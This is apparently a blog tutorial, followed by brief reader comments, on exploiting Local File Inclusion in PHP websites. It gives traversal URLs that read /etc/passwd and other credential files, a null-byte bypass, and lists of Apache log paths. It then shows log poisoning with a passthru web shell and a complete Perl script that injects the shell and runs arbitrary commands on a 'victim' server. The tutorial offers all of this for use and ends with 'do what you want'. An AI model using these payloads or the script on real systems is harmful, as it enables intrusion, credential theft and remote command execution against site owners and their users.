This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).
First lets take a look at a php code that is vulnerable to LFI:
Code:
<?php
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the
$page isn't sanitized and is passed directly to the webpage, but
unfortunately (or not ) is very common to be find in the www world.
Ok, now that we know why is it vulnerable let's start to use this in
our advantage. First let's take a look how this give us the ability to
"browse" thru the web server. Let's imagine theres a file called
test.php inside the test directory, if you type victim.com/test/test.php
will retrive that file correct? Ok, but if the php code that we
examined was in the index.php we could also retrive that file thru
victim.com/index.php?page=test/test.php , see what happened there? Now,
if the index.php was in victim.com/test/index.php and the test.php in
victim.com/test.php you will have to type
victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.
Now that we can go up and down thru the server let's use it to access
files that we are not supposed to. If this was hosted in a Unix server
we can then possibly view the password file of the server, to do this
you will have to type something like this (the nr of ../ may vary
depending of where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/ passwd
If you don't know what to do with the content of etc/passwd then
continue reading! The etc/passwd is where the users/passwords are
stored, a non shadowed passwd file will look like this:
Code:
username: passwd:UID:GID:full_name:directory:shell
For example:
Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh
All you need to do then is grab the username and decode the password.
If the passwd file is shadowed then you'll see something like this:
Code:
username:x:503:100:FullName:/home/username:/bin/sh
As you can see the password is now a x and the encoded password is now
in /etc/shadow (you will probably not have access to etc/shadow because
is only readable/writeable by root and etc/passwd has to be readable by
many
processes, thats why you have access to it).
You can also sometimes see something like this:
Code:
username:!:503:100:FullName:/home/username:/bin/sh
The ! indicates that the encoded password is stored in the etc/security/passwd file.
Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.
Just one more quick thing, its also common to find a vulnerable code like:
Code:
<?php
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../ etc/passwd.php that
file don't exist, and you will see an error message, so you need to
apply the null byte (%00):
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd%00
With the null byte the server will ignore everything that comes after %00.
There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin!
We will now gonna try to run commands on the server, we will do this by
injecting php code in the httpd logs and then access them by the LFI!
To do this first find out where the logs are stored, here is some
locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see
what they store, at this example we will use a log that stores the "not
found files" and the php code <? passthru(\$_GET[cmd]) ?>. You
will then type at your browser victim.com/<? passthru(\$_GET[cmd])
?> and the php code will be logged because it "dosen't exist".
This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru(\$_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to
use something else, if you don't have a script of your own you can use
this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="<? passthru(\$_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection
Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = <STDIN>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection
Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}
Copy/paste that, save it as whatever.pl and change what is in bold
accordingly to your victim site. If the vulnerable code is in
victim.com/main/test.php you should change the /folder/ to /main/ ,
index.php= to test.php= and the
../../../../../../../etc/httpd/logs/error_log to where the log is at!
That script will inject the code and then will ask you for a command to run on the server!
Now do what you want
good
ReplyDeleteThis is so basic that its not the same in the wild according to this "guide"
ReplyDeleteNice
ReplyDeletevery good
ReplyDelete